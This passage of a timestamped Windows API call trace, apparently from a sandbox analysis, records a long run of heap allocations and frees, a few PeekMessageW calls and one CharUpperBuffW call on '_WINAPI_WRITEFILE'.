hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0184.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0184.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0184.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0184.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0184.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0184.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0184.372] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.372] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0184.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0184.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0184.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0184.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0184.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0184.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0184.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0184.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0184.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0184.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0184.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.377] RtlAllocateHeap 